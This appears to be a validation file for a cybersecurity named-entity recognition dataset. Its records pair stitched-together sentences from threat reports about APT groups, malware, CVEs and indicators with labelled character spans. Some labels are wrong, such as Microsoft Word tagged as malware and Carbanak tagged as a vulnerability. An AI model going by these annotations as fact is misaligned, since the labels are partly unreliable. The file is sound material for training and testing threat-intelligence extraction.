{"text": "period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named “ lock ” , which is later exfiltrated The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . APT33 : 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP . None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": {"Organization: McAfee Advanced Threat Research": [[579, 610]], "Malware: data-gathering implant": [[648, 670]], "Malware: 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP": [[716, 805]]}, "info": {"id": "cyberner_stix_valid_000126", "source": "cyberner_stix_valid"}}
{"text": "Also of note is Bouncing Golf ’ s possible connection to a previously reported mobile cyberespionage campaign that researchers named Domestic Kitten . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": {"Malware: Bouncing Golf": [[16, 29]], "Malware: Domestic Kitten": [[133, 148]], "Malware: Winnti malware": [[540, 554]]}, "info": {"id": "cyberner_stix_valid_000127", "source": "cyberner_stix_valid"}}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 .", "spans": {"Vulnerability: CVE-2012-0158": [[79, 92]], "Malware: Microsoft Word": [[104, 118]], "Malware: MikroTik": [[265, 273]]}, "info": {"id": "cyberner_stix_valid_000128", "source": "cyberner_stix_valid"}}
{"text": "It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI , an operating system based on Google Android made by Xiaomi . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations .", "spans": {"Organization: Xiaomi": [[53, 59], [137, 143]], "System: MIUI": [[78, 82]], "System: Google Android": [[114, 128]], "Malware: TajMahal": [[183, 191]], "Organization: FireEye": [[295, 302]], "Malware: Poison Ivy RAT": [[346, 360]]}, "info": {"id": "cyberner_stix_valid_000129", "source": "cyberner_stix_valid"}}
{"text": "Israeli media published the first reports about the social networking and social engineering aspects of this campaign . According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry . This thread implements the main code , responsible for the entire botnet DLL . Up until now , we ’ve been relatively lucky – our most recent examples of social network - based cybercrime reveal threat actors using relatively mild motives ( monetization ) .", "spans": {"Organization: online video game industry": [[240, 266]], "Malware: botnet": [[335, 341]]}, "info": {"id": "cyberner_stix_valid_000130", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military .", "spans": {"Organization: Kaspersky": [[0, 9]], "Vulnerability: Adobe Flash Player zero-day vulnerability": [[43, 84]], "Vulnerability: CVE-2016-4117": [[87, 100]], "Malware: Epic Turla": [[235, 245]], "Organization: military": [[324, 332]]}, "info": {"id": "cyberner_stix_valid_000131", "source": "cyberner_stix_valid"}}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically .", "spans": {"Vulnerability: CVE-2017-0199": [[65, 78]], "Organization: gaming companies": [[170, 186]]}, "info": {"id": "cyberner_stix_valid_000132", "source": "cyberner_stix_valid"}}
{"text": "Conclusion The “ Corona Updates ” app had relatively low downloads in Pakistan , India , Afghanistan , Bangladesh , Iran , Saudi Arabia , Austria , Romania , Grenada , and Russia . Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware . . Most organizations receive and make use of intelligence published from third parties such as government agencies , specialist providers or collaborative groups .", "spans": {"Organization: Kaspersky Lab": [[181, 194]], "Organization: financial institutions": [[231, 253]], "Organization: government agencies": [[403, 422]], "Organization: specialist providers": [[425, 445]], "Organization: collaborative groups": [[449, 469]]}, "info": {"id": "cyberner_stix_valid_000133", "source": "cyberner_stix_valid"}}
{"text": "Bitdefender researchers have identified a new Android spyware , dubbed Triout , which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications . In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": {"Organization: Bitdefender": [[0, 11]], "System: Android": [[46, 53]], "Malware: Triout": [[71, 77]], "Organization: education": [[331, 340]], "Organization: job openings": [[343, 355]], "Organization: real estate": [[358, 369]], "Organization: semiconductors": [[374, 388]], "Malware: Carbanak": [[406, 414]]}, "info": {"id": "cyberner_stix_valid_000134", "source": "cyberner_stix_valid"}}
{"text": "July 7 Three exploits – two for Flash Player and one for the Windows kernel—were initially found in the information dump . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . considering each block and instruction addresses . Standard file deletion commands are available on most operating system and device interfaces to perform cleanup , but adversaries may use other tools as well .", "spans": {"System: Flash Player": [[32, 44]], "System: Windows": [[61, 68]], "Organization: banks": [[181, 186]], "Organization: e-payment": [[189, 198]], "Organization: financial institutions": [[211, 233]], "Vulnerability: Carbanak": [[283, 291]], "Organization: adversaries": [[474, 485]]}, "info": {"id": "cyberner_stix_valid_000135", "source": "cyberner_stix_valid"}}
{"text": "The HenBox app downloaded in May 2016 , as described in Table 1 below , masquerades as a legitimate version of the DroidVPN app by using the same app name “ DroidVPN ” and the same iconography used when displaying the app in Android ’ s launcher view , as highlighted in Figure 2 below Table 1 . Winnti's mode of operation: to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"System: DroidVPN": [[157, 165]], "System: Android": [[225, 232]], "Organization: charts of companies": [[369, 388]], "Organization: individual business units": [[441, 466]], "Organization: financial": [[557, 566]], "Organization: economic": [[569, 577]], "Organization: trade policy": [[582, 594]], "Malware: RATs": [[632, 636]], "Malware: Poison Ivy": [[645, 655]], "Malware: non-public backdoors": [[671, 691]]}, "info": {"id": "cyberner_stix_valid_000136", "source": "cyberner_stix_valid"}}
{"text": "Services can perform long-running operations in the background and does not need a user interface . As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets .", "spans": {"Organization: government": [[406, 416]]}, "info": {"id": "cyberner_stix_valid_000137", "source": "cyberner_stix_valid"}}
{"text": "This suggests that the Snake Wine group will likely continue to escalate their activity and persistently target both private and government entities within Japan . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"Organization: government entities": [[129, 148]], "Indicator: document malware": [[190, 206]], "Organization: Tibetan non-governmental organizations": [[226, 264]], "Organization: NGOs": [[267, 271]], "Organization: Falun Gong": [[293, 303]], "Organization: Uyghur groups": [[308, 321]]}, "info": {"id": "cyberner_stix_valid_000138", "source": "cyberner_stix_valid"}}
{"text": "In light of this , we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset .", "spans": {"Vulnerability: unpatched vulnerabilities": [[48, 73]], "Organization: FireEye": [[306, 313]], "Malware: RIPTIDE": [[339, 346]], "Malware: HIGHTIDE": [[350, 358]]}, "info": {"id": "cyberner_stix_valid_000139", "source": "cyberner_stix_valid"}}
{"text": "Shortly after releasing information on their espionage operations , our friends at TrendMicro found evidence that the operators were not only conducting classic strategic espionage but targeting SCADA systems as well . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": {"Organization: TrendMicro": [[83, 93]], "Organization: users": [[354, 359]]}, "info": {"id": "cyberner_stix_valid_000140", "source": "cyberner_stix_valid"}}
{"text": "Another novelty is a VPN-related package , which is based on OrbotVPN . The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment . This spear phish contained a malicious Word document that exploited CVE-2012-0158 . Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": {"System: OrbotVPN": [[61, 69]], "Vulnerability: CVE-2012-0158": [[330, 343]], "System: Microsoft Graph API": [[380, 399]], "System: Azure and M365 environments": [[434, 461]]}, "info": {"id": "cyberner_stix_valid_000141", "source": "cyberner_stix_valid"}}
{"text": "Monitor and remove any unauthorized code present in any www directories .", "spans": {}, "info": {"id": "cyberner_stix_valid_000142", "source": "cyberner_stix_valid"}}
{"text": "All of the URLs reference the file “ mms.apk ” and all use the domain “ XXXX.ru ” , which belongs to a top five shared hosting platform in Russia ( the domain itself has been obfuscated to anonymize the provider ) . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker . Some static information about SFX are : New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": {}, "info": {"id": "cyberner_stix_valid_000143", "source": "cyberner_stix_valid"}}
{"text": "In this case , the attacker can get the list of all installed apps and then remotely launch the victim ’ s app of their choice to either steal credentials or perform malicious actions ( e.g . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations .", "spans": {"Malware: spam emails": [[212, 223]], "Organization: banks": [[288, 293]], "Malware: decoy documents": [[374, 389]], "Organization: government": [[554, 564]], "Organization: aerospace organizations": [[569, 592]]}, "info": {"id": "cyberner_stix_valid_000144", "source": "cyberner_stix_valid"}}
{"text": "Stage 5 : The final loader takes control The stage 5 malware is needed only to provide one more layer of obfuscation , through the VM , of the final malware payload and to set up a special Structured Exception Hander routine , which is inserted as Wow64PrepareForException in Ntdll . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The Internal name of this DLL is a randomly looking CLSID and it only exports one function called DllEntry . When exploiting these flaws , the threat actor almost always deploys a tunneling tool , the most common of which are Fast Reverse Proxy Client FRPC and Plink .", "spans": {"Vulnerability: flaws": [[678, 683]]}, "info": {"id": "cyberner_stix_valid_000145", "source": "cyberner_stix_valid"}}
{"text": "“ Pulling Back the Curtains on EncodedCommand PowerShell Attacks ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000146", "source": "cyberner_stix_valid"}}
{"text": "We labeled this new variant XLoader version 7.0 , because of the different deployment method and its use of the native code to load the payload and hide in Instagram and Tumblr profiles . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight . If a query with the M action returns an IP address that is not 99.250.250.199 , the malware will use ping mode . In mid - June 2023 , KillNet announced that the collective and actors claiming to be from the Russian ransomware group REvil were collaborating in a joint operation targeting Western financial systems .", "spans": {"Malware: XLoader": [[28, 35]], "Organization: Instagram": [[156, 165]], "Organization: Tumblr": [[170, 176]], "Indicator: 99.250.250.199": [[353, 367]], "Organization: Western financial systems": [[578, 603]]}, "info": {"id": "cyberner_stix_valid_000147", "source": "cyberner_stix_valid"}}
{"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": {"Organization: restaurant": [[79, 89]], "Organization: services": [[92, 100]], "Organization: financial sectors": [[105, 122]], "Organization: Mandiant": [[195, 203]]}, "info": {"id": "cyberner_stix_valid_000148", "source": "cyberner_stix_valid"}}
{"text": "Furthermore , conflating adversaries with tools , since tools can be repurposed or used by other entities than those first observed deploying them , leads to further potential confusion as the “ X actor ” is quickly compressed in the minds of some to refer to any and all instantiations of tool “ X ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000149", "source": "cyberner_stix_valid"}}
{"text": "EventBot permissions EventBot ’ s permissions as seen in the manifest file . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia .", "spans": {"Malware: EventBot": [[0, 8], [21, 29]], "Malware: makeself.sh": [[77, 88]], "Malware: shell script": [[100, 112]], "Malware: Emissary": [[220, 228]]}, "info": {"id": "cyberner_stix_valid_000150", "source": "cyberner_stix_valid"}}
{"text": "Intezer has evidence dating back to September 2018 which shows Pacha Group has been using a cryptomining malware that has gone undetected on other engines . As shown above , the threat runs several native binaries to collect useful information for its recon phase .", "spans": {"Organization: Intezer": [[0, 7]], "Malware: native binaries": [[198, 213]]}, "info": {"id": "cyberner_stix_valid_000151", "source": "cyberner_stix_valid"}}
{"text": "In particular , this second group also has the capability of dumping users ' credentials using the same technique employed by Mimikatz . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"Organization: government institutions": [[259, 282]], "Organization: embassies": [[285, 294]], "Organization: oil and gas industry": [[301, 321]], "Organization: military contractors": [[343, 363]], "Organization: activists": [[368, 377]]}, "info": {"id": "cyberner_stix_valid_000152", "source": "cyberner_stix_valid"}}
{"text": "Once infected njRAT communicates to the attacker and allows the attacker to log keystrokes , upload/download files , access victims web camera , audio recording , steal credentials , view victims desktop , open reverse shell etc .", "spans": {"Malware: njRAT": [[14, 19]]}, "info": {"id": "cyberner_stix_valid_000153", "source": "cyberner_stix_valid"}}
{"text": "Take steps to secure Windows systems , such as installing and configuring Microsoft 's Enhanced Mitigation Experience Toolkit ( EMET ) and Microsoft AppLocker .", "spans": {"Organization: Microsoft": [[74, 83], [139, 148]]}, "info": {"id": "cyberner_stix_valid_000154", "source": "cyberner_stix_valid"}}
{"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software .", "spans": {"Malware: date string": [[35, 46]], "Malware: date codes": [[64, 74]], "Malware: Lurk banking trojan": [[192, 211]], "Organization: banks": [[294, 299]]}, "info": {"id": "cyberner_stix_valid_000155", "source": "cyberner_stix_valid"}}
{"text": "Once archive is loaded , the application uses reflection api to call methods from the class names specified in the json . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 .", "spans": {"Vulnerability: CVE-2017-0144": [[254, 267]], "Malware: errr.aspx": [[316, 325]], "Malware: DustySky": [[337, 345]], "Malware: NeD Worm": [[357, 365]]}, "info": {"id": "cyberner_stix_valid_000156", "source": "cyberner_stix_valid"}}
{"text": "The Zen trojan uses its root privileges to turn on accessibility service ( a service used to allow Android users with disabilities to use their devices ) for itself by writing to a system-wide setting value enabled_accessibility_services . The attack wave started in late July 2011 and continued into midSeptember 2011 . Both Japan and Taiwan are important intelligence collection targets for China , particularly because of recent changes to Japan ’s pacifist constitution and the upcoming Taiwanese election . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"Malware: Zen": [[4, 7]], "System: Android": [[99, 106]]}, "info": {"id": "cyberner_stix_valid_000157", "source": "cyberner_stix_valid"}}
{"text": "In contrast however , for OnionDuke and MiniDuke the linked image files contain embedded malware to be downloaded and executed , rather than instructions .", "spans": {"Malware: OnionDuke": [[26, 35]], "Malware: MiniDuke": [[40, 48]]}, "info": {"id": "cyberner_stix_valid_000158", "source": "cyberner_stix_valid"}}
{"text": ", kernel32.dll , advapi32.dll , and version.dll ) and remapping them in memory . The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region . OceanLotus Steganography Malware Analysis White Paper . Eventually , when the DLL is copied into its final path , rundll32.exe is used to call the exported function SetQueryNetSessionCount , which downloads the next stage .", "spans": {"Malware: DLL": [[287, 290]]}, "info": {"id": "cyberner_stix_valid_000159", "source": "cyberner_stix_valid"}}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": {"Malware: Documents": [[0, 9]], "Vulnerability: Flash exploit": [[19, 32]], "Indicator: thanks.pps": [[173, 183]], "Indicator: request.docx": [[247, 259]]}, "info": {"id": "cyberner_stix_valid_000160", "source": "cyberner_stix_valid"}}
{"text": "Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows ( CVE-2015-1701 ) .", "spans": {"Organization: Microsoft": [[0, 9]], "System: Windows": [[82, 89]], "Vulnerability: CVE-2015-1701": [[92, 105]]}, "info": {"id": "cyberner_stix_valid_000161", "source": "cyberner_stix_valid"}}
{"text": "SUSPECTED DETECTION TESTS BY THE THREAT ACTOR In searching for EventBot , we ’ ve identified multiple submissions from the same submitter hash , 22b3c7b0 : EventBot 22b3c7b0 submitter hash The 22b3c7b0 submitter hash that submitted most of the EventBot samples to VirusTotal . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Malware: EventBot": [[63, 71], [156, 164], [244, 252]], "Malware: Ursnif": [[353, 359]], "Malware: Urlzone": [[364, 371]], "Organization: CrowdStrike": [[545, 556]], "Organization: dissidents": [[611, 621]]}, "info": {"id": "cyberner_stix_valid_000162", "source": "cyberner_stix_valid"}}
{"text": "Additionally , a specific loader is often associated with the MiniDuke toolset and is referred to as the “ MiniDuke loader ” .", "spans": {"Malware: MiniDuke": [[62, 70], [107, 115]]}, "info": {"id": "cyberner_stix_valid_000163", "source": "cyberner_stix_valid"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": {"Vulnerability: Carbanak": [[20, 28]], "Organization: financial industry": [[145, 163]], "Organization: customers": [[187, 196]], "Vulnerability: CVE-2012-0773": [[203, 216]]}, "info": {"id": "cyberner_stix_valid_000164", "source": "cyberner_stix_valid"}}
{"text": "If a smartphone or tablet was released more than a year ago , it is probably no longer supported by the manufacturer and patching of vulnerabilities is no longer provided . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server . The numbering on each arrow corresponds to the chronological sequence of events . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"Malware: Royal": [[397, 402]], "Malware: BlackSuit": [[407, 416]]}, "info": {"id": "cyberner_stix_valid_000165", "source": "cyberner_stix_valid"}}
{"text": "July 20 A new zero-day vulnerability ( CVE-2015-2426 ) was found in Windows , which Microsoft fixed in an out-of-band patch . CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program . Additionally , In early 2023 , KillMilk , the claimed founder of KillNet , attempted to ransom the purportedly stolen documents to NATO for 3 bitcoin , possibly in part to increase attention surrounding the activity .", "spans": {"Vulnerability: zero-day vulnerability": [[14, 36]], "Vulnerability: CVE-2015-2426": [[39, 52]], "System: Windows": [[68, 75]], "Organization: Microsoft": [[84, 93]]}, "info": {"id": "cyberner_stix_valid_000166", "source": "cyberner_stix_valid"}}
{"text": "One common evasive mechanism used by the Spark backdoor is its ability to check for installed security products using WMI queries ( WQL ) .", "spans": {"Malware: Spark backdoor": [[41, 55]]}, "info": {"id": "cyberner_stix_valid_000167", "source": "cyberner_stix_valid"}}
{"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies . After that , the attacker is capable to control the compromised device .", "spans": {"Organization: specific individuals": [[247, 267]], "Organization: institutions": [[272, 284]], "Organization: military": [[303, 311]], "Organization: intelligence agencies": [[328, 349]], "Organization: government": [[362, 372]]}, "info": {"id": "cyberner_stix_valid_000168", "source": "cyberner_stix_valid"}}
{"text": "\" ZjRTc1dTTU9nVW5FaXM3bGgvbU90MTlVMHFkb1c5SFFuRXhhSVR5YytIQkZremk3bk5wY21BUEZRYitJenA1cnlJY1lxREJJZ1RrL0N4UzZWcVVQM0pTUWFISlhKWG8wN1BxWE1hYThHSUdEVnBFakYrNlp1bXBvdUZMRFNYQVhxYk9tSElWYTFOTlpJK0hFVVBmTG9CQUV3VCtqQ2FCVUE1aHQ2SzllSHREMUpOdkdBUXZ3TWgyLzhtVHpha2I0TE81ZlpURTQyUmVjdFY1M0ZpemlRR1FLL1gzNE9mcU0zR0JqQ1ZnN1hCSmFGaC94RHBDMkNBRmZaSTVoVlhsaTBtQW5SR3N5QzVRY2lMNkpZVFJuRTQrUzBjdjU4SjY4ejRCL2FNbW9IakRheHdQd1RPUElkOHNDbDRVbmp2ZDM0ZVZlZTB1QVA0UHo0YllyVHRMZVRnPT0= \" .", "spans": {}, "info": {"id": "cyberner_stix_valid_000169", "source": "cyberner_stix_valid"}}
{"text": "Back in 2011-2012 , the group used a relatively tiny implant ( known as “ Sofacy ” or SOURFACE ) as its first stage malware .", "spans": {"Malware: SOURFACE": [[86, 94]]}, "info": {"id": "cyberner_stix_valid_000170", "source": "cyberner_stix_valid"}}
{"text": "The keywords are comprised of the names of individuals .", "spans": {}, "info": {"id": "cyberner_stix_valid_000171", "source": "cyberner_stix_valid"}}
{"text": "MyReceiver and AlarmReceiver start the MainService whenever appropriate events occur . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . BRONZE BUTLER : REDBALDKNIGHT , Tick .", "spans": {"Vulnerability: zero-day vulnerability": [[118, 140]], "Organization: Symantec": [[171, 179]]}, "info": {"id": "cyberner_stix_valid_000172", "source": "cyberner_stix_valid"}}
{"text": "] com csip6 [ . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . POSHSPY is an excellent example of the skill and craftiness of APT29 .", "spans": {"Organization: healthcare": [[94, 104]], "Organization: high-tech": [[107, 116]], "Organization: telecommunications": [[123, 141]], "Organization: sectors": [[142, 149]], "Malware: POSHSPY": [[152, 159]]}, "info": {"id": "cyberner_stix_valid_000173", "source": "cyberner_stix_valid"}}
{"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest .", "spans": {"Organization: telecommunications": [[258, 276]], "Organization: shipping": [[279, 287]], "Organization: car manufacturers": [[290, 307]], "Organization: universities": [[310, 322]], "Organization: health care industries": [[327, 349]], "Malware: Infy message": [[410, 422]]}, "info": {"id": "cyberner_stix_valid_000174", "source": "cyberner_stix_valid"}}
{"text": "Multiple Dipsind variants have been identified , all of which are believed to be used exclusively by PLATINUM . During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 .", "spans": {"Organization: Kaspersky Lab": [[119, 132], [324, 337]], "Malware: NetTraveler": [[148, 159]]}, "info": {"id": "cyberner_stix_valid_000175", "source": "cyberner_stix_valid"}}
{"text": "Call Service Figure 5 : Code for the calls service As seen above , the calls service stores incoming call details in .mp3 format in the /sdcard/DCIM/.dat/ directory with file name appended with \" In_ '' for incoming calls and \" Out_ '' for outgoing calls . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . It is sometimes referred to as FIN7 , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": {"Vulnerability: CVE-2010-3962": [[271, 284]], "Vulnerability: CVE-2014-1776": [[327, 340]], "Malware: Carbanak": [[438, 446]]}, "info": {"id": "cyberner_stix_valid_000176", "source": "cyberner_stix_valid"}}
{"text": "If one of the applications is deleted , the second application downloads and re-installs the removed one . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors .", "spans": {"Organization: FireEye iSIGHT Intelligence": [[107, 134]], "Vulnerability: zero-day Adobe Flash vulnerability": [[199, 233]], "Vulnerability: CVE-2018-4878": [[236, 249]], "Organization: restaurant": [[387, 397]], "Organization: services": [[400, 408]], "Organization: financial sectors": [[413, 430]]}, "info": {"id": "cyberner_stix_valid_000177", "source": "cyberner_stix_valid"}}
{"text": "As described in earlier analyses , Downeks ’ main purpose is as a downloader .", "spans": {"Malware: Downeks": [[35, 42]]}, "info": {"id": "cyberner_stix_valid_000178", "source": "cyberner_stix_valid"}}
{"text": "From the samples we collected , we can conclude that the same threat actor produced many individual malware modules during the last ten years . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"Malware: Carbanak": [[144, 152]], "Organization: consumer": [[220, 228]], "Malware: Carberp": [[320, 327]]}, "info": {"id": "cyberner_stix_valid_000179", "source": "cyberner_stix_valid"}}
{"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition .", "spans": {"Malware: sample": [[146, 152]], "Vulnerability: CVE-2017-11882": [[172, 186]], "Vulnerability: CVE-2018-0802": [[190, 203]]}, "info": {"id": "cyberner_stix_valid_000180", "source": "cyberner_stix_valid"}}
{"text": "The code supports two different installation methods : setup in a UAC-enforced environment ( with limited privileges ) , or an installation with full-administrative privileges enabled ( in cases where the malware gains the ability to run with elevated permissions ) . APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence . To aid in the recovery of encrypted payloads , the following Python script can be used to decode pixel colors from a .png image . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload • None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": {"System: UAC-enforced environment": [[66, 90]]}, "info": {"id": "cyberner_stix_valid_000181", "source": "cyberner_stix_valid"}}
{"text": "We also observed automatically generated files on the C2 , indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents . This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component . The ShellMain function is a stub that relocates the DLL to another buffer and spawns a thread that starts from ShellMainThreadInt at offset +0xC0CD . Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools – notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": {"Organization: ordinary users": [[598, 612]], "Organization: organizations": [[617, 630]], "System: server infrastructures-": [[684, 707]]}, "info": {"id": "cyberner_stix_valid_000182", "source": "cyberner_stix_valid"}}
{"text": "This is done by opening the Google account creation process and parsing the current view . Attackers then moved on to the motor industry in late May . TechNet ’s security was in no way compromised by this tactic , which is likely possible on other message boards and forums . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": {"Organization: Google": [[28, 34]], "Organization: motor industry": [[122, 136]]}, "info": {"id": "cyberner_stix_valid_000183", "source": "cyberner_stix_valid"}}
{"text": "Later campaigns saw new attachment types , even as Dridex and Locky payloads remained largely unchanged .", "spans": {"Malware: Dridex": [[51, 57]], "Malware: Locky": [[62, 67]]}, "info": {"id": "cyberner_stix_valid_000184", "source": "cyberner_stix_valid"}}
{"text": "APT28 has continued to develop its tools over the past two years .", "spans": {}, "info": {"id": "cyberner_stix_valid_000185", "source": "cyberner_stix_valid"}}
